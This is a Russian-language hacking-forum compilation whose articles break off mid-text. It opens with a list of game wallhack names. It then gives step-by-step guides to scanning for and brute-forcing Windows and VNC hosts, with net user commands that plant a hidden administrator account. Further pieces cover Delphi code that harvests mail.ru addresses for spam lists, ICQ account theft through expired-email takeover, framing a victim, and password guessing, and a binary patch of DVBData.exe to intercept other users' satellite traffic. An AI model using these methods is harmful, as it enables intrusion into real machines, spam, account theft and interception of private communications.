XQZ Wallhack

Simple WallHack

ASUS Wallhack

Lineframe WallHack

FAUST WallHack

Wireframe WallHack

No Wall Wallhack, жаль что скриншота чита нету, но извесно что такой wallhack очень заметный и легко распазнаётся админами и античитами. 

И так приступим .....
Мы будем искать деды на открытые порты 139,135 - null session и 5900 - VNC.

Можно использовать множество сканеров но я предпочитаю angry ip scanner качаем его Angry
чтобы было удобно юзать данный сканер создаём баник *.bat файлег с диапазонами в виде
Код:

ipscan.exe 192.168.0.1 192.168.2.2 192.168.0.1_192.168.2.2.txt


отсюда видно что запускается наш сканер ipscan.exe, берем его тут ht*tp://ifolder.ru/8010833 сканирует диапазон от 192.168.0.1 до 192.168.2.2 и сохраняет результат в 192.168.0.1_192.168.2.2.txt
Чтобы не мучатся с вбивом диапазонов так как их может быть 400-500 а то и более был написан парсер для этого качаем парсер Parser ht*tp://ifolder.ru/8010875
закидываем в парсер диапазоны в виде 192.168.0.1 192.168.2.2 он нам выдаст их в виде ipscan.exe 192.168.0.1 192.168.2.2 192.168.0.1_192.168.2.2.txt
диапазоны по странам можно смотреть тут Ip rang http://www.proxyserverprivacy.com/ipaddress_range.php
теперь настраиваем наш сканер на скан портов 139,135,5900 и запускаем наш сканер и идем пить кофе ну или лучше поспать
после скана одного диапазона создастся файлек в папке с сканером под названием ip от-до.txt(192.168.0.1_192.168.2.2.txt) если вы будете сканить 500 диапазонов то в папке со сканером будет 500 файликов
Для удобства парсинга результатов angry был написан еще 1 парсер качаем его Parser 2 ht*tp://ifolder.ru/8010885
закидываем в него все результаты от скана он нам разделит ипы на 3 столбца 139 135 5900
И так для брута дедов с открытой null session(139,135) я использую NTscan качаем его NTscan ht*tp://ifolder.ru/8010908
думаю все разберутся как его юзать.
а так же для массавого чека VNC (5900) дедов используем VNCmasss качаем его VNCmass ht*tp://ifolder.ru/8011105
VNCmasss позволит приконектится к бажному VNC деду без авторизации .

Когда NTscan сбрутит деда то пробуем к нему подключиться через RDP если не подключается то значит на деде закрыт порт 3389 про такой дед лучше забыть,а если открыт данный порт на дедике и мы зашли на дед то быстренько создаем учетку

cmd
net user user pass /add
net localgroup Administrators user /add
net localgroup "Remote Desktop Users" user /add
net accounts /maxpwage:unlimited
exit
заходм под свеже созданной учеткой и наслаждаемся добытым Дедиком


в случае если вы вошли на дед через бажный VNC то так же проверяем открыт ли порт 3389 если порт открыт по такому же примеру приведенному выше создаём учетку
Если RDP закрыт то на такой дед можно забить.Бажные Vnc Восновном на XP и толку от таких дедов мало.

Удачного всем брута и скана
Спасибо за внимание .

P.S Из за фильтрации движка, в ссылки были вставлены звездочки.

Сразу хочу предупредить, что данная статья направлена показать некомпетентность администрации и программистов сайта mail.ru, их безразличие к своим пользователям. Весь исходный код представленный в этой статье предназначен только для ознакомления, и автор не несет никакой ответственности за его незаконное использование.

Предыстория.
С тех давних пор как я являюсь пользователем всемирной паутины, меня интересовал вопрос, каким образом мой e-mail попадает в хакерские спам листы и почему я должен тратить своё время на их удаление. Вот я решил провести эксперимент, какие из известных почтовых сервисов больше всего подвергаются завалу спамом. Зарегистрировавшись на mail, rambler, yandex и google я начал усердно пользоваться дополнительными услугами этих сервисов, не затрагивая другие сайты. Вскоре я забыл о своём эксперименте, вспомнив о нём примерно через месяц. Каково было моё удивление, когда я проверил содержимое почтового ящика mail.ru – 76 спам писем за 1 месяц, на других же сервисах всё обстояло иначе: rambler – 2, yandex – 1, google вообще ноль. Это говорило только об одном утечка происходит где-то на самом сервисе, и я начал искать. Искать пришлось не долго, оказалось mail.ru и не собирался скрывать информацию о своих пользователях. Если ты являешься активным пользователем, имеешь Фотоальбом, Блог или Мой Мир, то твой e-mail можно найти в любой ссылки на твой источник.
Например:
Ссылка на Блог http://r.mail.ru/cln4001/blogs.mail.ru/mail/lyanochka_94/ - следовательно e-mail: lyanochka_94@mail.ru
Ссылка на Фотоальбом http://foto.mail.ru/list/karapet74/ - следовательно e-mail: karapet74@list.ru
Ссылка на Мой Мир http://my.mail.ru/mail/kristia_love/ - следовательно e-mail: kristia_love@mail.ru
Самая открытая ссылка используется для того чтобы пригласить человека пообщаться в Mail Агенте http://www.mail.ru/agent?message&to=olga.hermann1208@mail.ru естественно e-mail: olga.hermann1208@mail.ru
Самым интересным оказался Мой Мир, так как там можно осуществлять поиск по имени, фамилии, стране, городу, по интересам, даже по цвету глаз!!! Представляете масштабность этой дырки. Допустим я злой хацкер и хочу разослать спам всем москвичам или я открыл новый сайт посвященный какой-то теме и я хочу его раскрутить. Я просто ввожу в поиске нужный критерий и всё вот они будущие жертвы, которые предрасположены к открытию моего спама, т.к. эта тема возможно будет им интересна.
Надеюсь в скором будущем mail.ru закроет все свои дырки, и заменит прямое написание логина пользователя в ссылках хотя бы на какой-нибудь ID.

Кодинг.
Так как все-таки статья называется «Пишем генератор Спам листа» приступим к написанию программы, которая будет использовать в качестве основы эту дырку.
Кодить будем на Delphi, поэтому первым делом надо его запустить. Программа будет полуавтоматической, поэтому первым делом закидываем на форму TWebBrowser. В OnCreate для формы пишем:
procedure TForm1.FormCreate(Sender: TObject);
var
Flags: OLEVariant;
begin
Flags := 0;
WebBrowser1.Navigate(WideString('http://my.mail.ru'),Flags,Flags,Flags,Flags);
end;
Ещё закинем TMemo и TButton. И не забудем изменить свойство ScrollBars на ssBoth у Memo1. Добавим в нашу программку следующую функцию:
Function After ( Src:string ; Var S:string ) : string ;
Var
F : Word ;
begin
F := POS (Src,S) ;
if F=0 then
After := ''
else
After := COPY(S,F+length(src),length(s)) ;
end ;
В OnClick дл Button1 пишем:
procedure TForm1.Button1Click(Sender: TObject);
var
x:word;
s,temp,n: string;
Flags: OLEVariant;
begin
for x:=0 to WebBrowser1.OleObject.Document.Links.Length-1 do
begin
temp:=WebBrowser1.OleObject.Document.Links.Item(x);
s:=After('http://www.mail.ru/agent?message&to=',temp);
if s <>'' then memo1.lines.Add(s);
if x>46 then
begin
if After('http://my.mail.ru/my/classmates',temp)<>'' then n:=temp;
if After('http://my.mail.ru/my/search',temp)<>'' then n:=temp;
if After('http://my.mail.ru/my/neighbour',temp)<>'' then n:=temp;
if After('http://my.mail.ru/my/military_search',temp)<>'' then n:=temp;
end;
end;
Flags := 0;
WebBrowser1.Navigate(WideString(n),Flags,Flags,Flags,Flags);
end;
Вот в принципе и весь кодинг.

Работаем.
Для начала работы с нашей прожкой для начала необходимо зарегистрироваться на mail.ru и создать Свой Мир. Затем просто запускаем наш генератор, вводим логин и пароль, нажимаем на ссылке Поиск людей, выбираем тип поиска, нажимаем найти. Mail говорит нашел ли он юзеров, и сколько. Далее нажимаем на нашем Button1 и в наше Memo1 помещается 20 mail’ов, страница обновляется и опять нажимаем на батон и т.д. пока не надоест…Конечно же можно всё автоматизи ... Читать дальше »

Способ #1
Номера первого миллиона регистрировались около 5 лет назад. Поэтому, если пользователь не менял настроек и информации с первой регистрации, то у вас есть шанс обнаружить, что его email-адрес (если он был зарегистрирован на халявном сервере типа yahoo или же hotmail) аннулирован по бездействию. Тогда Вам требуется просто зарегистрить такой же адрес, пойти на http://www.icq.com/password, ввести номер жертвы - и пароль придёт к вам в свежесделанный почтовый ящик. Запустите ICQ. Выберите меню Add/Find users. Теперь выберите Main search/Search by ICQ number (UIN). Введите номер, который вы хотите получить (чем старее номер, тем больше шансов на удачу). Жмите Info. Теперь смотрите на e-mail этого человека. Он должен быть взят на халявном сервере. Если он взят не на халявных серверах - жмите BACK и начните с начала. Теперь - вам нужно пойти на этот сервер и проверить существование данного e-mail'а. Если он еще существует - то идите к началу. Если же его нет - то вы почти победили. Зарегистрируйте e-mail этого человека (полностью идеентичный). И последнее - идите в раздел для забывчевых, вводите этот UIN и ваш "новый" e-mail. В ближайшее время вам вышлют пароль! 

Способ #2
Существует другой, более сложный варинт лишeния пользователя его e-mail. Есть конкретные правила поведения пользователей сервиса (например: e-mail - нельзя спамить, web - нельзя открыто размещать детское порно), нарушая которые пользователи, как правило, лишаются права на адрес или веб-страницу. Кто мешает вам написать несколько десятков тысяч воззваний к легализации детской порнографии и проституции от имени duke@something.com? Установите тип сервера, узнайте язык общения с ним клиента, и пошлите все эти возвания самому себе и своим друзьям (или на другие емейл аккаунты), указав обратным адресом duke@something.com. Далее вы и ваши друзья должны будете переправить все "полученное" от Duke по адресу администратора домена с нотой протеста против легализации и с просьбой наказать виновного. "Послания" Duke следует уничтожить, и в завязавшейся переписке с администрацией сообщить, что следов преступения осталось мало: вы все стерли, так как были шокированны, и праведный гнев обуял вас так сильно, что всем подьездом вас держали. Попросите администратора обязательно держать вас в курсе дела. Далее пошлите сообщение того же самого содержания (используя обратный адрес Duke) другим вашим друзьям или на другие почтовые аккаунты, и напишите администрации о этом безобразии в других словах. Создайте видимость, что этот Duke шлет тысячами сообщения о нелегальных вещах группе незнакомых между собой людей... Прогнозирую до 80% успеха, у Duke отнимут аккаунт, о чем вам заявят как о большом достижении в борьбе со спамерами и рассадниками порнографии. Вы в тот же день зарегистрируете аккаунт на себя и заявите о потере пассворда. В итоге у вас - долгожданный UIN и твердая уверенность в том, что если вы имеете бесплатный емейл - никто никогда у вас его не отнимет. 
Будте внимательны, каждое электронное сообщение содержит заголовок (header), представляющий из себя служебную информацию о дате отправления сообщения, названии почтовой программы, IP адресе машины, с которой было отправлено сообщение, и т.д. Поэтому исполюзуйте для этих целей специальные программы для спама, которые способны скрыть эту информацию. Вот некоторые из них: SendIt, EzyMassMailer, CTMailer, MailThemPro и запускайте их через прокси сервер. У большенства спамеров отсутствует в настройках возможность работать через прокси, но это легко поправить с помощью программы SocksCap (программа, позволяющия запускать через сокет любое приложение, о нем не знающее), для коннекта используется проски SOCKS-4 или SOCKS-5 port:1080. Из-под SocksCap вы можете запускать сканеры портов и практически любые программы, скрывая свой реальный IP. Это очень актуально сегодня, т.к многие провайдеры за эти "маленькие шалости" лишают пользователей доступа в сеть :(( 

Способ #3
Этот способ требует значительных усилий и основан на том, что многие люди используют в качестве пароля какое-нибудь легковычисляемое слово, например свой ник или имя. Запустите ICQ. Выберите меню Add/Find users. Теперь выберите Main search/Search by ICQ number (UIN). Введите номер, который вы хотите получить. Жмите Info. Запомните Uin, ник, настояшее имя пользователя и другие детали. Нажмите на значок ICQ и выберите Add/Change Current User. Жмите Add another registered user, Next, Next. Теперь вводите UIN, а в качестве пароля - ник, имя или какую-то другую относящуюся к данному пользователю информацию. Вполне возможно, что вам повезёт. Вообще говоря, существует также целый ряд паролей, особенно "любимых" малоопытными пользователями, например "Password", "qwerty", "12345" и т.д. Хотя подбор паролей - это тема отдельной статьи, и мы не будем здесь подробно на этом останавлив ... Читать дальше »

Развитие современных компьютерных технологий поражает. Устройства становятся меньше, а вычислительные способности удваиваются, чуть ли не каждый год! Уже ни кого не удивить высокоскоростным доступом ADSL, беспроводным Wi-Fi и тем более GRPS и его продолжением - EDGE. На рядового пользователя трудится даже космическая отрасль. Вывод спутников на орбиту - колоссальные затраты, а все ради того, что бы мы могли наслаждаться спутниковым телевидением и спутниковым Интернетом. Скорость и дешевизна, зачастую являются главным критерием при выборе подключения к Интернет. Спутниковый доступ к сети - самый оптимальный вариант, но и самый ненадежный - в плане безопасности.

Внимание! Цель данной статьи - рассмотреть возможность перехвата информации в спутниковых сетях и варианты защиты. Автор не несет ответственности за возможное применение полученной информации из статьи в противозаконных целях. Данная технология описана для общего развития, но ни как руководство к действию.
Атака

Для начала давайте разберемся, каким образом информация передается по спутниковым каналам связи. Система основана на том, что клиентский компьютер по наземным каналам связи передает запрос в дата центр на получение какой либо информации из Интернета. В датацентре запрос обрабатывается и он загружает все по тем же наземным каналам связи информацию, которую запросил клиент. Далее из датацентра информация идет на транспондер, в задачи которого входит передать информацию на спутник. Вот тут и открывается истина - задача спутника сродни задаче зеркала - просто отражать полученный сигнал - т. е. все, что приходит от транспондера спутник просто отправляет опять на землю, но уже не в виде узкого пучка, как лазер, а более расширено - как свет от фонарного столба, чем он выше - тем больше снизу световое пятно.

Что же у нас получается - спутник рассеял нашу информацию по огромной поверхности нашей планеты, как же мы ее получим?

Здесь в роль вступает DVB карточка и тарелка. Так как сигнал со спутника приходит к нам уже с довольно низким потенциалом - его необходимо усилить. Для этого нам и нужна тарелка, и чем она больше - тем лучший сигнал мы получим. Тарелка всего лишь отражает сигнал на конвертер, который уже и является непосредственно самим приемником сигнала. Но сигнал недостаточно просто принять - его надо отфильтровать. Ведь в один момент времени в сигнале может находиться информация, которую запросили, например, 100 человек. DVB карта фильтрует сигнал, полученный конвертером, и оставляет нам только то, что запросили мы и отсекает то, что запросил сосед. Как видно из всей этой цепочки - самый уязвимый элемент системы состоит в том, что данные разделяются на клиентской стороне. Вот этим мы и воспользуемся.

Что нам надо сделать для получения сторонней информации? Правильно - сделать так чтоб наша DVB карточка, фильтровала чуть-чуть не так, как задумал производитель. Фильтрация происходит по нескольким параметрам - по MAC-адресу DVB карточки или же по IP-адресу. Настройка фильтрации производится в сопутствующей программе для спутникового Интернета, например – DVBData из комплекта TTBudget-1401.

Как было уже сказано выше, непосредственно фильтрацию производит не сама карточка, а ее софт - тот самый, который мы запускаем при подключении к Интернету используя спутник. И именно его, мигающего нам зеленым цветом в трее при хорошем сигнале, мы и будем эксплуатировать (на примере DVBData от TTBudget - 1401).

После непродолжительного изучения работы и алгоритма DVBData.exe, была найдена возможность (простой заменой некоторых строк в исполняемом файле) заставить фильтр работать на нас. По умолчанию DVBData.exe не фильтрует так называемые multicast пакеты, которые рассылает провайдер спутникового Интернета. В multicast пакетах может быть и техническая информация, а может быть и программа передач. Но не столь важно, что может быть в этих multicast – главное, что фильтруются они по MAC-адресам, которые жестко прописаны в DVBData.exe. И если в самой программе изменить эти адреса – то мы заставим DVB карточку пропускать через себя абсолютно любые пакеты с произвольным MAC-адресом, вместо multicast.

Для этого откроем в любимом HEX редакторе DVBData.exe и поменяем все 10 адресов по смещению 72168h вида 01005E000008 на мак адрес карточки, информацию с которой нам надо получить. После изменения адресов сохраняем наш измененный файл под именем DVBData2.exe и копируем его в тот же каталог, что и оригинал.

И вот настал самый интересный момент - нам осталось направить нашу тарелку на тот же самый спутник, что и у нашего коллеги. Запустить наш модифицированный DVBData2.exe. И с удовольствием наблюдать, как в трее начинает мигать значок сетевого подключения - теперь информация, которую запросил наш друг, приходит и к нему и к нам!

Но что с того, что к нам приходят посторон ... Читать дальше »